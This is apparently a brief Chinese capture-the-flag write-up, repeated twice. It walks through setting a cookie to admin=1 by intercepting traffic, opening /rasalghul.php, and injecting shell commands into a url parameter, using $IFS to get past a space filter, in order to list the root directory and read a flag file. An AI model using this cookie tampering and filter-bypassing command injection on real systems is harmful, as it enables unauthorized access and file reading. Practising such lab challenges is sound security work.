又是一道洋葱题,讨厌洋葱
根据题目,要使cookie为admin=1,抓包更改cookie值
放包后得到
在网址后加上/rasalghul.php
空格被禁了,可以用$IFS代替
输入url=ls$IFS/
查询flllllaaaaaaggggggg文件内容
url=cat$IFS/flllllaaaaaaggggggg
又是一道洋葱题,讨厌洋葱
根据题目,要使cookie为admin=1,抓包更改cookie值
放包后得到
在网址后加上/rasalghul.php
空格被禁了,可以用$IFS代替
输入url=ls$IFS/
查询flllllaaaaaaggggggg文件内容
url=cat$IFS/flllllaaaaaaggggggg